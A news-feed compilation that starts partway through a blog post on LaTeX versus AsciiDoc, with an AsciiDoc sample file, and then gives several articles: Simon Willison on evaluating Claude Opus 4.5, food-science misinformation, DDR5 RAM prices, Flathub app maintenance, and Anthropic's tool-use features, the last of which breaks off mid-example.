example.adoc
:library: Asciidoctor
:stylesdir: style
:stylesheet: stylesheet.css
:imagesdir: images
:source-highlighter: pygments
// This lets asciidoctor inline images into the HTML output
:data-uri:
:toc: left
include::misc/kroki-settings.adoc[]

= AsciiDoc Examples

== Paragraphs

**Lorem ipsum dolor sit amet**, consectetur adipiscing elit. Sed eleifend feugiat tortor, in dignissim felis blandit non. Fusce suscipit urna id neque iaculis scelerisque. Fusce convallis leo turpis, vel blandit sapien malesuada at. Vestibulum ut elit eu quam laoreet mattis pulvinar vitae libero. Cras egestas, lacus non condimentum facilisis, risus tortor lobortis velit, quis facilisis ex risus sit amet ligula. Praesent facilisis lacus eros, et dictum tortor varius sed. Nam gravida mollis mattis. Sed eros nulla, varius et posuere sed, congue non dolor. Nullam urna risus, condimentum ac tempus sed, sagittis et nunc. Ut at fermentum diam. Quisque consequat tincidunt tellus vitae consectetur.

_Curabitur vestibulum ante metus_, a vestibulum nisl efficitur iaculis. Sed id massa sed nibh suscipit consectetur sit amet et massa. Morbi ex leo, congue in nunc et, tristique euismod enim. Nunc in dolor vitae erat egestas suscipit. Nulla hendrerit et dolor et sagittis. Praesent posuere nibh ac erat bibendum, vel interdum enim imperdiet. Aliquam erat volutpat. Donec quis porttitor purus. Etiam accumsan dignissim est et porta. Fusce eget sem laoreet, suscipit nisi quis, pulvinar libero. Etiam eu rutrum velit. In tortor arcu, luctus vitae posuere sit amet, molestie in odio. Donec purus tortor, pretium ut erat non, fringilla rhoncus massa. Nam ac dapibus orci, quis convallis nisl. Phasellus quis neque et velit scelerisque maximus.

== Tables

=== Basic

|===
|Column 1, header row |Column 2, header row |Column 3, header row

|Cell in column 1, row 2
|Cell in column 2, row 2
|Cell in column 3, row 2

|Cell in column 1, row 3
|Cell in column 2, row 3
|Cell in column 3, row 3
|===

=== CSV Paste-in

[%header,format=csv]
|===
"Column 1, header row","Column 2, header row","Column 3, header row"
"Cell in column 1, row 2","Cell in column 2, row 2","Cell in column 3, row 2"
"Cell in column 1, row 3","Cell in column 2, row 3","Cell in column 3, row 3",
|===

== Lists

=== Normal

* Hello
* World!

=== Numbered

. Hello
. World!

== Code Highlighting

[source,ruby]
----
puts "Hello World!"
----

== Diagrams

=== Mermaid

[mermaid]
....
flowchart LR
    Hello --> World!
....

=== Graphviz

[graphviz]
....
digraph {
    Hello -> "World!"
}
....

=== Vega-Lite

[vegalite]
....
{
  "$schema": "https://vega.github.io/schema/vega-lite/v4.json",
  "description": "Horizontally concatenated charts that show different types of discretizing scales.",
  "data": {
    "values": [
      {"a": "A", "b": 28},
      {"a": "B", "b": 55},
      {"a": "C", "b": 43},
      {"a": "D", "b": 91},
      {"a": "E", "b": 81},
      {"a": "F", "b": 53},
      {"a": "G", "b": 19},
      {"a": "H", "b": 87},
      {"a": "I", "b": 52}
    ]
  },
  "hconcat": [
    {
      "mark": "circle",
      "encoding": {
        "y": {
          "field": "b",
          "type": "nominal",
          "sort": null,
          "axis": {
            "ticks": false,
            "domain": false,
            "title": null
          }
        },
        "size": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "quantize"
          }
        },
        "color": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "quantize",
            "zero": true
          },
          "legend": {
            "title": "Quantize"
          }
        }
      }
    },
    {
      "mark": "circle",
      "encoding": {
        "y": {
          "field": "b",
          "type": "nominal",
          "sort": null,
          "axis": {
            "ticks": false,
            "domain": false,
            "title": null
          }
        },
        "size": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "quantile",
            "range": [80, 160, 240, 320, 400]
          }
        },
        "color": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "quantile",
            "scheme": "magma"
          },
          "legend": {
            "format": "d",
            "title": "Quantile"
          }
        }
      }
    },
    {
      "mark": "circle",
      "encoding": {
        "y": {
          "field": "b",
          "type": "nominal",
          "sort": null,
          "axis": {
            "ticks": false,
            "domain": false,
            "title": null
          }
        },
        "size": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "threshold",
            "domain": [30, 70],
            "range": [80, 200, 320]
          }
        },
        "color": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "threshold",
            "domain": [30, 70],
            "scheme": "viridis"
          },
          "legend": {
            "title": "Threshold"
          }
        }
      }
    }
  ],
  "resolve": {
    "scale": {
      "color": "independent",
      "size": "independent"
    }
  }
}
....

=== Structurizr

[structurizr]
....
 workspace {
    model {
        user = person "User"
        softwareSystem = softwareSystem "Software System" {
            webapp = container "Web Application" {
                user -> this "Uses!!!"
            }
            database = container "Database" {
                webapp -> this "Reads from and writes to"
            }
        }
    }
    views {
        systemContext softwareSystem {
            include *
            autolayout lr
        }
        container softwareSystem {
            include *
            autolayout lr
        }
        theme default
    }
}
....

This file includes a helper file to set a few settings for the imported Kroki images.

kroki-settings.adoc
:kroki-fetch-diagram: true
:kroki-default-options: inline
:kroki-default-format: svg
ifdef::backend-pdf[]
// For the PDF backend, using SVG doesn't work with mermaid diagrams
:kroki-default-format: png
endif::[]
// Port to a local docker container running Kroki
:kroki-server-url: http://kroki:8000

This can then be compiled to an asciidoc.html or asciidoc.pdf file. Note that the source includes almost no extraneous syntax concerned with document structure or anything but the content. Data from CSV files can be included in AsciiDoc without much hassle, and interoperability with multiple diagram backends is demonstrated.

What AsciiDoc shows in simplicity is also its weakest point. It doesn't leave too many possibilities for formatting or changing the overall structure of the document. While the format shown in this example is fine for many documents, AsciiDoc lacks a simple way of taking meaningful control over the overall design, even though it can be done . However, one might argue that AsciiDoc precisely keeps LaTeX' promise that the author ultimately does not have to worry about formatting. It is therefore very popular for technical documentation.

Another serious alternative to LaTeX, especially when it comes to scientific texts, seems to be Typst . I can’t make any real statements about it since I haven’t used it yet. However, its syntax, features and results already look quite nice.

Why LaTeX?

With all the cynical critique aside: What are the features that make people vouch for LaTeX? Looking around online, you will find a large community that simply loves how documents created with it look . The typesetting has become the main argument for defending its use. Is that really LaTeX' only strong suit?

Typographic Beauty Craze

LaTeX produces some very good looking text. Yep. Don’t believe me? Look at this comparison of Word, InDesign and LaTeX by Roel Zinkstok. Kerning? Ligatures? Proper spacing for easier readability? It’s all there.

But that is expected from a typesetting system, isn’t it? The whole point of TeX was to create beautifully rendered text, and at its core, that’s what LaTeX can offer. Additionally, LaTeX brings beauty to mathematical typesetting! With its handsomely rendered mathematical formulas, LaTeX has inspired libraries such as MathJax and KaTeX to also provide this typesetting capability in modern web browsers.

This quality is an obvious plus when writing professional documents or publishing a book. LaTeX gives self-published authors the ability to provide output that (typographically) matches what professional publishers can achieve. After all, publishers love LaTeX too!

A Publisher’s Tool

The primary idea behind TeX was for it to be used for book publishing. It’s no wonder that many publishers use it. With the help of packages such as memoir it becomes manageable to take full control over typesetting and many other aspects of a document. This kind of deep and precise control is offered by neither Word nor AsciiDoctor.

LaTeX’ support for cross-references, glossaries, bibliographies, lists of figures and automatic generation of a larger document’s structure makes it an essential tool for writing scientific books or theses. These features rightfully make it very popular in academic circles for writing papers.

Familiar in Academic Circles

LaTeX is a product of academia. Mathematicians, physicists and computer scientists rejoice over their favorite document creation software. Therefore it is no wonder that LaTeX is their first choice when collaborating on papers. In the aforementioned disciplines it essentially is the only choice. Back when I went to university, we had no choice but to use LaTeX to write essays and seminar papers, since it was a formal requirement to use specific LaTeX templates.

This implicit familiarity helps in collaboration. Packages developed for LaTeX to provide certain (niche) features that a researcher might need for their paper can be picked up and used by other researchers. The de-facto standard in these fields also helps to standardize the writing and publishing process for academic work.

Conclusion

LaTeX is patchwork. At its core is TeX, a typesetting monolith. Around this core are macros that attempt to patch functionality into a system that fundamentally isn’t designed for it. This leads to a complicated system with strange syntax, fickle interactions and possible problems that nobody wants to deal with.

Authors should not have to care about document formatting and design and LaTeX makes the promise that this isn’t the case. This promise is broken. The author not only has to worry about formatting, they also have to deal with technical details and LaTeX’ intricacies. LaTeX simply isn’t a tool for the author but for the typesetter and publisher.

If the author needs full control over the document’s design, LaTeX is the wrong choice unless they want to spend an enormous amount of time. It also isn’t the right choice when collaboration and simple interoperability are important. LaTeX forces the author to fully commit to its complex system, whether they like it or not.

So is LaTeX just useless for the author? Absolutely not. In certain scientific fields LaTeX is the de-facto standard and mathematical typesetting rarely looks as good as it does in documents created with it. It sometimes is the only choice depending on the need.

But what if we don’t have these peculiar needs? Sensible usage of LaTeX might consist of using it as a backend. Tools like Sphinx use reStructuredText as an input language which can then be transpiled to LaTeX to generate documents using better typesetting. Using this approach the author gets the best of both worlds: simple, understandable syntax and TeX’ formatting power.

LaTeX is also not the only document preparation system and it is far from being the standard . It’s good to look at alternatives like AsciiDoc or Typst in order to get a better feel for what kind of tools are out there that might fit your needs much better. LaTeX is best at some things but its design comes from a time that is long gone. Modern times have arrived and with modern times come modern tools. What a time to be alive!

Claude Opus 4.5, and why evaluating new LLMs is increasingly difficult

Simon Willison
simonwillison.net
2025-11-24 19:37:07
Anthropic released Claude Opus 4.5 this morning, which they call "best model in the world for coding, agents, and computer use". This is their attempt to retake the crown for best coding model after significant challenges from OpenAI's GPT-5.1-Codex-Max and Google's Gemini 3, both released within th...
Original Article

24th November 2025

Anthropic released Claude Opus 4.5 this morning, which they call “best model in the world for coding, agents, and computer use”. This is their attempt to retake the crown for best coding model after significant challenges from OpenAI’s GPT-5.1-Codex-Max and Google’s Gemini 3 , both released within the past week!

The core characteristics of Opus 4.5 are a 200,000 token context (same as Sonnet), 64,000 token output limit (also the same as Sonnet), and a March 2025 “reliable knowledge cutoff” (Sonnet 4.5 is January, Haiku 4.5 is February).

The pricing is a big relief: $5/million for input and $25/million for output. This is a lot cheaper than the previous Opus at $15/$75 and keeps it a little more competitive with the GPT-5.1 family ($1.25/$10) and Gemini 3 Pro ($2/$12, or $4/$18 for >200,000 tokens). For comparison, Sonnet 4.5 is $3/$15 and Haiku 4.5 is $4/$20.

The Key improvements in Opus 4.5 over Opus 4.1 document has a few more interesting details:

I had access to a preview of Anthropic’s new model over the weekend. I spent a bunch of time with it in Claude Code, resulting in a new alpha release of sqlite-utils that included several large-scale refactorings—Opus 4.5 was responsible for most of the work across 20 commits, 39 files changed, 2,022 additions and 1,173 deletions in a two day period.

It’s clearly an excellent new model, but I did run into a catch. My preview expired at 8pm on Sunday when I still had a few remaining issues in the milestone for the alpha . I switched back to Claude Sonnet 4.5 and... kept on working at the same pace I’d been achieving with the new model.

With hindsight, production coding like this is a less effective way of evaluating the strengths of a new model than I had expected.

I’m not saying the new model isn’t an improvement on Sonnet 4.5—but I can’t say with confidence that the challenges I posed it were able to identify a meaningful difference in capabilities between the two.

This represents a growing problem for me. My favorite moments in AI are when a new model gives me the ability to do something that simply wasn’t possible before. In the past these have felt a lot more obvious, but today it’s often very difficult to find concrete examples that differentiate the new generation of models from their predecessors.

Google’s Nano Banana Pro image generation model was notable in that its ability to render usable infographics really does represent a task at which previous models had been laughably incapable.

The frontier LLMs are a lot harder to differentiate between. Benchmarks like SWE-bench Verified show models beating each other by single digit percentage point margins, but what does that actually equate to in real-world problems that I need to solve on a daily basis?

And honestly, this is mainly on me. I’ve fallen behind on maintaining my own collection of tasks that are just beyond the capabilities of the frontier models. I used to have a whole bunch of these but they’ve fallen one-by-one and now I’m embarrassingly lacking in suitable challenges to help evaluate new models.

I frequently advise people to stash away tasks that models fail at in their notes so they can try them against newer models later on—a tip I picked up from Ethan Mollick. I need to double-down on that advice myself!

I’d love to see AI labs like Anthropic help address this challenge directly. I’d like to see new model releases accompanied by concrete examples of tasks they can solve that the previous generation of models from the same provider were unable to handle.

“Here’s an example prompt which failed on Sonnet 4.5 but succeeds on Opus 4.5” would excite me a lot more than some single digit percent improvement on a benchmark with a name like MMLU or GPQA Diamond.

In the meantime, I’m just gonna have to keep on getting them to draw pelicans riding bicycles . Here’s Opus 4.5 (on its default “high” effort level ):

The pelican is cute and looks pretty good. The bicycle is not great - the frame is wrong and the pelican is facing backwards when the handlebars appear to be forwards. There is also something that looks a bit like an egg on the handlebars.

It did significantly better on the new more detailed prompt :

The pelican has feathers and a red pouch - a close enough version of breeding plumage. The bicycle is a much better shape.

Fighting Food Misinformation

Portside
portside.org
2025-11-24 19:31:47
Fighting Food Misinformation jeannette Mon, 11/24/2025 - 14:31 ...
Original Article

From left: Mary Ellen Kuhn, Charlie Arnot, and Veronica Jaramillo | Food technology

To successfully combat science denial and misinformation in the age of social media and online influencers, food scientists need to connect on an emotional level and find shared values before attempting to pepper people with facts, said panelists during a Hot Topics Studio session on Wednesday at IFT FIRST.

“You can’t just talk louder and harder, and offer more facts. You can do that, but that’s not strategic,” said Charlie Arnot, founder and CEO of both The Center for Food Integrity and the Look East strategic communications firm, during the session titled “Myth Busting Misinformation: How to Combat Science Denial,” moderated by Mary Ellen Kuhn, executive editor at Food Technology magazine. “You can embrace and validate someone’s concerns without validating their misinformation. That gives you permission to engage as a trusted, credible authority that they will then interpret as being relevant and valuable to them.”

As fewer people get their news from traditional sources and more turn to online and social media outlets—especially true among younger generations—everyone ends up in an echo chamber of their own preexisting beliefs, said Veronica Jaramillo, cofounder of The Food Truth Project and a food science graduate student at McGill University.

“The algorithm is working a little too well for our own good,” she said. “You’re teaching the algorithm to bring on this information that you’re already believing. It’s very rare that you find something in your feed that’s contrary to your own beliefs.” And when people do, they often greet that information with skepticism or outright hostility, she added.

From the time of Galileo in the 1600s until the dawn of the 21st century, science was widely regarded as the arbiter of truth, yet reliant on communications technologies to spread those truths—such as print publications, radio, or television—which had “some level of informal or formal social control,” Arnot said. The launch of Facebook in 2004 fundamentally changed communication patterns to a “many-to-many” dynamic, which provided “the opportunity to have an infinite number of microcultures” and a “dispersion of authority,” he said.

In spite of that, a recent survey of consumers that asked who they trusted the most on food and nutrition information found that the top three answers were registered dietitians, primary care physicians, and food scientists—a result that heartened Jaramillo. “I thought No. 1 would be social media influencers,” she said. “We’re still in the game. Does that mean people are getting most information from [those three groups]? No.”

To nudge their way toward being more front-of-mind, food scientists need to listen and ask questions—and then share information, Arnot said. “It’s not about correcting individuals,” he said. “If your pitch is, ‘You’re wrong, and here’s why,’ you’re going to immediately alienate the person. If you listen, ask, listen, ask, and then share, you will find a point of connection. … It’s about finding that point of connection and engaging in meaningful dialogue. That takes practice because we’ve been trained to communicate the science: ‘Here’s what the research says.’”

Scientists communicate with each other by sharing data findings and meta-analyses, Jaramillo agreed. “We’re not taught, as scientists, to communicate with the general public. People don’t respond to that,” she said. “If you say, ‘Look at this data,’ [they respond by saying], ‘Why should I care? This doesn’t impact me. Science is for scientists.’ It feeds into the narrative that science and scientists are not accessible. People think scientists are on this high horse and only able to speak to each other.”

Instead of saying “look at this data,” scientists need to tell a story, Jaramillo said, recalling a person who buttonholed her after a workshop to say they didn’t like GMOs because, “I think it changes our DNA.” She listened, asked questions, and understood better what made the person wary—and then told them about Golden Rice, a genetically modified strain that has saved the lives of an estimated 40,000 to 100,000 children who had been facing severe vitamin A deficiency. “That’s a tangible story that connects with their values,” she said. “It’s an example of something we can give them that’s not just, ‘Here are the facts; here are the facts.’”

Another piece of advice Jaramillo shared: don't get too emotionally invested or take people's reactions too personally, which she acknowledged struggling with herself. "I felt like an attack against science was an attack against me: 'You don't believe in the work I'm doing,'" she said. "I wanted to scream at the top of my lungs. … I get frustrated with people who don't understand the safety protocols behind our food. But I can't expect everyone to have the food science background I do. It's our job—not just the communicators, but everyone in the food industry—to communicate better about what we do."

About the Author

Ed Finkel is a freelance journalist based in Evanston, Ill. ( edfinkel@edfinkel.com ).

PS5 now costs less than 64GB of DDR5 memory. RAM jumps to $600 due to shortage

Hacker News
www.tomshardware.com
2025-11-24 19:29:12
Comments...
Original Article
G.Skill Trident Z5 Neo RGB DDR5-6000 C26
(Image credit: Tom's Hardware)

Thanks to the AI boom devouring the majority of the world's memory and storage supply, end-consumers are now facing increasingly inflated prices for common components. DDR5 RAM, a necessity for building current-gen Intel or AMD systems, has now reached record highs in terms of pricing; a 64 GB kit of G.Skill's Trident Z5 Neo 6000 MT/s RAM is listed at $599.99 on Newegg right now — that's $200 more than a PS5 Slim or a Microsoft Xbox Series S, and just $50 shy of an entire PS5 Pro at the moment.


A quick glance at price tracking data shows that G.Skill's Trident Z5 Neo kit regularly sat at $205-$220 for the past few months, and it was only in late October that it started to pick up steam: from $220 on September 20th to $640 now. In just two months we've witnessed an astounding ~190% surge.

This particular Trident Z5 Neo kit began to skyrocket in price right as the industry first started to pick up on the effects of the AI crunch. A few days later we published our initial coverage on DDR5 RAM price hikes; from there, the situation has only worsened to reach worrying levels.

NAND Flash pricing decline

(Image credit: Micron)

Insane mark-up aside, the kit itself is one of the best on the market, recommended as the top pick for DDR5 memory in our roundup. Unfortunately, it seems like high prices are going to be the story going forward. The surge in demand for AI projects will see production lines prioritizing AI clients, leaving consumers to pay through the nose or make the best of what they have. Experts speculate that both DRAM and NAND constraints will become the norm throughout 2026 as Big Tech looks to pursue AGI.

In the meantime, hard drives are vanishing from store shelves to the point where microSD cards are serving as a feasible replacement for them. Large-capacity nearline HDDs are backordered for 2 years , as a result of which QLC SSDs are now being swept up at alarming rates. Many distributors are even selling memory and motherboards bundled together to combat the global shortage.

Even Valve's upcoming Steam Machine will end up costing more than expected due to the production window of the device aligning with the DRAM crisis. That being said, memory has almost always lived in a rollercoaster cycle, with manufacturers oversupplying for a couple of years, then undersupplying for the next few. Looking at it optimistically, you're probably going to find DDR5 at bargain prices again in 2027 .


Hassam Nasir is a die-hard hardware enthusiast with years of experience as a tech editor and writer, focusing on detailed CPU comparisons and general hardware news. When he’s not working, you’ll find him bending tubes for his ever-evolving custom water-loop gaming rig or benchmarking the latest CPUs and GPUs just for fun.

Unpowered SSDs slowly lose data

Hacker News
www.xda-developers.com
2025-11-24 19:25:25
Comments...

How do we keep apps maintained on Flathub? (or building a more respectful App Store)

Lobsters
tim.siosm.fr
2025-11-24 19:23:35
Comments...
Original Article

There have been a few discussions about what Flathub should do to push developers to maintain their apps on the latest versions of the published runtimes. But most of those lack important details around how this would actually happen. I will not discuss in this post the technical means that are already in place to help developers keep their dependencies up to date. See the Flathub Safety: A Layered Approach from Source to User blog post instead.

The main thing to have in mind is that Flathub is not a commercial entity like other app stores. Right now, developers that put their apps on Flathub are (in the vast majority) not paid to do so and most apps are under an open source license.

So any discussion that starts with “developers should update to the latest runtime or have their apps removed” directly contradicts the social contract here (which is also in the terms of most open source licenses): You get something for free so don’t go around making demands unless you want to look like a jerk. We are not going to persuade overworked and generally volunteer developers to update their apps by putting pressure on them to do more work. It’s counter productive.

With that out of the way, how do we gently push developers to keep their apps up to date and using the latest runtime? Well, we can pay them. Flathub wants to setup a way to offer payments for applications but unfortunately it’s not ready yet. So in the meantime, the best option is to donate to the projects or developers working on those applications.

And make it very easy for users to do so.

Now we are in luck, this is exactly what some folks have been working on recently. Bazaar is a Flathub first app store that makes it really easy to donate to the apps that you have installed.

But we also need to make sure that the developers actually have something set up to get donations.

And this is where the flatpak-tracker project comes in. This project looks for the donation links in a collection of Flatpaks and checks if there is one and if the website is still up. If it's not, it opens issues in the repo for tracking and fixing. It also checks if those apps are using the latest runtimes and opens issues for that as well ( FreeDesktop , GNOME , KDE ).

If you want to help, you can take a look at this repo for apps that you use and see if things need to be fixed. Then engage and suggest fixes upstream. Some of this work does not require complex technical skills, so it's a really good way to start contributing. This is probably one of the most direct ways to enable developers to receive money from their users, via donations.

Updating the runtime used by an app usually requires more work and more testing, but it’s a great way to get started and to contribute to your favorite apps. And this is not just about Flathub: updating a Qt5 app to run with Qt6, or a GNOME 48 app to 49, will help everyone using the app.

We want to build an App Store that is respectful of the time developers put into developing, submitting, publishing, testing and maintaining their apps.

We don’t want to replicate the predatory model of other app stores.

Will some apps be out of date sometimes? Probably, but I would rather have a sustainable community than an exploitative one.

Claude Advanced Tool Use

Hacker News
www.anthropic.com
2025-11-24 19:21:35
Comments...
Original Article

The future of AI agents is one where models work seamlessly across hundreds or thousands of tools. An IDE assistant that integrates git operations, file manipulation, package managers, testing frameworks, and deployment pipelines. An operations coordinator that connects Slack, GitHub, Google Drive, Jira, company databases, and dozens of MCP servers simultaneously.

To build effective agents , they need to work with unlimited tool libraries without stuffing every definition into context upfront. Our blog article on using code execution with MCP discussed how tool results and definitions can sometimes consume 50,000+ tokens before an agent reads a request. Agents should discover and load tools on-demand, keeping only what's relevant for the current task.

Agents also need the ability to call tools from code. When using natural language tool calling, each invocation requires a full inference pass, and intermediate results pile up in context whether they're useful or not. Code is a natural fit for orchestration logic, such as loops, conditionals, and data transformations. Agents need the flexibility to choose between code execution and inference based on the task at hand.

Agents also need to learn correct tool usage from examples, not just schema definitions. JSON schemas define what's structurally valid, but can't express usage patterns: when to include optional parameters, which combinations make sense, or what conventions your API expects.

Today, we're releasing three features that make this possible:

  • Tool Search Tool, which allows Claude to use search tools to access thousands of tools without consuming its context window
  • Programmatic Tool Calling , which allows Claude to invoke tools in a code execution environment reducing the impact on the model’s context window
  • Tool Use Examples , which provides a universal standard for demonstrating how to effectively use a given tool

In internal testing, we’ve found these features have helped us build things that wouldn’t have been possible with conventional tool use patterns. For example, Claude for Excel uses Programmatic Tool Calling to read and modify spreadsheets with thousands of rows without overloading the model’s context window.

Based on our experience, we believe these features open up new possibilities for what you can build with Claude.

Tool Search Tool

The challenge

MCP tool definitions provide important context, but as more servers connect, those tokens can add up. Consider a five-server setup:

  • GitHub: 35 tools (~26K tokens)
  • Slack: 11 tools (~21K tokens)
  • Sentry: 5 tools (~3K tokens)
  • Grafana: 5 tools (~3K tokens)
  • Splunk: 2 tools (~2K tokens)

That's 58 tools consuming approximately 55K tokens before the conversation even starts. Add more servers like Jira (which alone uses ~17K tokens) and you're quickly approaching 100K+ token overhead. At Anthropic, we've seen tool definitions consume 134K tokens before optimization.

But token cost isn't the only issue. The most common failures are wrong tool selection and incorrect parameters, especially when tools have similar names like notification-send-user vs. notification-send-channel .

Our solution

Instead of loading all tool definitions upfront, the Tool Search Tool discovers tools on-demand. Claude only sees the tools it actually needs for the current task.

Tool Search Tool diagram
Tool Search Tool preserves 191,300 tokens of context compared to 122,800 with Claude’s traditional approach.

Traditional approach:

  • All tool definitions loaded upfront (~72K tokens for 50+ MCP tools)
  • Conversation history and system prompt compete for remaining space
  • Total context consumption: ~77K tokens before any work begins

With the Tool Search Tool:

  • Only the Tool Search Tool loaded upfront (~500 tokens)
  • Tools discovered on-demand as needed (3-5 relevant tools, ~3K tokens)
  • Total context consumption: ~8.7K tokens, preserving 95% of context window

This represents an 85% reduction in token usage while maintaining access to your full tool library. Internal testing showed significant accuracy improvements on MCP evaluations when working with large tool libraries. Opus 4 improved from 49% to 74%, and Opus 4.5 improved from 79.5% to 88.1% with Tool Search Tool enabled.

How the Tool Search Tool works

The Tool Search Tool lets Claude dynamically discover tools instead of loading all definitions upfront. You provide all your tool definitions to the API, but mark tools with defer_loading: true to make them discoverable on-demand. Deferred tools aren't loaded into Claude's context initially. Claude only sees the Tool Search Tool itself plus any tools with defer_loading: false (your most critical, frequently-used tools).

When Claude needs specific capabilities, it searches for relevant tools. The Tool Search Tool returns references to matching tools, which get expanded into full definitions in Claude's context.

For example, if Claude needs to interact with GitHub, it searches for "github," and only github.createPullRequest and github.listIssues get loaded—not your other 50+ tools from Slack, Jira, and Google Drive.

This way, Claude has access to your full tool library while only paying the token cost for tools it actually needs.

Implementation:

{
  "tools": [
    // Include a tool search tool (regex, BM25, or custom)
    {"type": "tool_search_tool_regex_20251119", "name": "tool_search_tool_regex"},

    // Mark tools for on-demand discovery
    {
      "name": "github.createPullRequest",
      "description": "Create a pull request",
      "input_schema": {...},
      "defer_loading": true
    }
    // ... hundreds more deferred tools with defer_loading: true
  ]
}

For MCP servers, you can defer loading entire servers while keeping specific high-use tools loaded:

{
  "type": "mcp_toolset",
  "mcp_server_name": "google-drive",
  "default_config": {"defer_loading": true}, # defer loading the entire server
  "configs": {
    "search_files": {
"defer_loading": false
    }  // Keep most used tool loaded
  }
}

The Claude Developer Platform provides regex-based and BM25-based search tools out of the box, but you can also implement custom search tools using embeddings or other strategies.
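As a rough illustration of the custom-strategy idea, here is a conceptual sketch that ranks deferred tool definitions by keyword overlap with a query. It is not the actual custom search tool interface; the function names and scoring below are hypothetical, and a real implementation might swap the scorer for BM25 or embedding similarity.

# Conceptual sketch only: rank deferred tool definitions by keyword overlap.
def score(query: str, tool: dict) -> int:
    words = set(query.lower().split())
    text = f"{tool['name']} {tool['description']}".lower()
    return sum(1 for w in words if w in text)

def search_tools(query: str, deferred_tools: list[dict], top_k: int = 5) -> list[dict]:
    # Only the top_k matches would be expanded into Claude's context.
    return sorted(deferred_tools, key=lambda t: score(query, t), reverse=True)[:top_k]

# e.g. search_tools("create a github pull request", deferred_tools)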

When to use the Tool Search Tool

Like any architectural decision, enabling the Tool Search Tool involves trade-offs. The feature adds a search step before tool invocation, so it delivers the best ROI when the context savings and accuracy improvements outweigh additional latency.

Use it when:

  • Tool definitions consuming >10K tokens
  • Experiencing tool selection accuracy issues
  • Building MCP-powered systems with multiple servers
  • 10+ tools available

Less beneficial when:

  • Small tool library (<10 tools)
  • All tools used frequently in every session
  • Tool definitions are compact

Programmatic Tool Calling

The challenge

Traditional tool calling creates two fundamental problems as workflows become more complex:

  • Context pollution from intermediate results : When Claude analyzes a 10MB log file for error patterns, the entire file enters its context window, even though Claude only needs a summary of error frequencies. When fetching customer data across multiple tables, every record accumulates in context regardless of relevance. These intermediate results consume massive token budgets and can push important information out of the context window entirely.
  • Inference overhead and manual synthesis : Each tool call requires a full model inference pass. After receiving results, Claude must "eyeball" the data to extract relevant information, reason about how pieces fit together, and decide what to do next—all through natural language processing. A five tool workflow means five inference passes plus Claude parsing each result, comparing values, and synthesizing conclusions. This is both slow and error-prone.

Our solution

Programmatic Tool Calling enables Claude to orchestrate tools through code rather than through individual API round-trips. Instead of Claude requesting tools one at a time with each result being returned to its context, Claude writes code that calls multiple tools, processes their outputs, and controls what information actually enters its context window.

Claude excels at writing code and by letting it express orchestration logic in Python rather than through natural language tool invocations, you get more reliable, precise control flow. Loops, conditionals, data transformations, and error handling are all explicit in code rather than implicit in Claude's reasoning.

Example: Budget compliance check

Consider a common business task: "Which team members exceeded their Q3 travel budget?"

You have three tools available:

  • get_team_members(department) - Returns team member list with IDs and levels
  • get_expenses(user_id, quarter) - Returns expense line items for a user
  • get_budget_by_level(level) - Returns budget limits for an employee level

Traditional approach :

  • Fetch team members → 20 people
  • For each person, fetch their Q3 expenses → 20 tool calls, each returning 50-100 line items (flights, hotels, meals, receipts)
  • Fetch budget limits by employee level
  • All of this enters Claude's context: 2,000+ expense line items (50 KB+)
  • Claude manually sums each person's expenses, looks up their budget, compares expenses against budget limits
  • More round-trips to the model, significant context consumption

With Programmatic Tool Calling :

Instead of each tool result returning to Claude, Claude writes a Python script that orchestrates the entire workflow. The script runs in the Code Execution tool (a sandboxed environment), pausing when it needs results from your tools. When you return tool results via the API, they're processed by the script rather than consumed by the model. The script continues executing, and Claude only sees the final output.

Programmatic tool calling flow
Programmatic Tool Calling enables Claude to orchestrate tools through code rather than through individual API round-trips, allowing for parallel tool execution.

Here's what Claude's orchestration code looks like for the budget compliance task:

import asyncio
import json

team = await get_team_members("engineering")

# Fetch budgets for each unique level
levels = list(set(m["level"] for m in team))
budget_results = await asyncio.gather(*[
    get_budget_by_level(level) for level in levels
])

# Create a lookup dictionary: {"junior": budget1, "senior": budget2, ...}
budgets = {level: budget for level, budget in zip(levels, budget_results)}

# Fetch all expenses in parallel
expenses = await asyncio.gather(*[
    get_expenses(m["id"], "Q3") for m in team
])

# Find employees who exceeded their travel budget
exceeded = []
for member, exp in zip(team, expenses):
    budget = budgets[member["level"]]
    total = sum(e["amount"] for e in exp)
    if total > budget["travel_limit"]:
        exceeded.append({
            "name": member["name"],
            "spent": total,
            "limit": budget["travel_limit"]
        })

print(json.dumps(exceeded))

Claude's context receives only the final result: the two to three people who exceeded their budget. The 2,000+ line items, the intermediate sums, and the budget lookups do not affect Claude’s context, reducing consumption from 200KB of raw expense data to just 1KB of results.

The efficiency gains are substantial:

  • Token savings : By keeping intermediate results out of Claude's context, PTC dramatically reduces token consumption. Average usage dropped from 43,588 to 27,297 tokens, a 37% reduction on complex research tasks.
  • Reduced latency : Each API round-trip requires model inference (hundreds of milliseconds to seconds). When Claude orchestrates 20+ tool calls in a single code block, you eliminate 19+ inference passes. The API handles tool execution without returning to the model each time.
  • Improved accuracy : By writing explicit orchestration logic, Claude makes fewer errors than when juggling multiple tool results in natural language. Internal knowledge retrieval improved from 25.6% to 28.5%; GIA benchmarks from 46.5% to 51.2%.

Production workflows involve messy data, conditional logic, and operations that need to scale. Programmatic Tool Calling lets Claude handle that complexity programmatically while keeping its focus on actionable results rather than raw data processing.

How Programmatic Tool Calling works

1. Mark tools as callable from code

Add code_execution to tools, and set allowed_callers to opt-in tools for programmatic execution:

{
  "tools": [
    {
      "type": "code_execution_20250825",
      "name": "code_execution"
    },
    {
      "name": "get_team_members",
      "description": "Get all members of a department...",
      "input_schema": {...},
      "allowed_callers": ["code_execution_20250825"] # opt-in to programmatic tool calling
    },
    {
      "name": "get_expenses",
 	...
    },
    {
      "name": "get_budget_by_level",
	...
    }
  ]
}

The API converts these tool definitions into Python functions that Claude can call.

2. Claude writes orchestration code

Instead of requesting tools one at a time, Claude generates Python code:

{
  "type": "server_tool_use",
  "id": "srvtoolu_abc",
  "name": "code_execution",
  "input": {
    "code": "team = get_team_members('engineering')\n..." # the code example above
  }
}

3. Tools execute without hitting Claude's context

When the code calls get_expenses(), you receive a tool request with a caller field:

{
  "type": "tool_use",
  "id": "toolu_xyz",
  "name": "get_expenses",
  "input": {"user_id": "emp_123", "quarter": "Q3"},
  "caller": {
    "type": "code_execution_20250825",
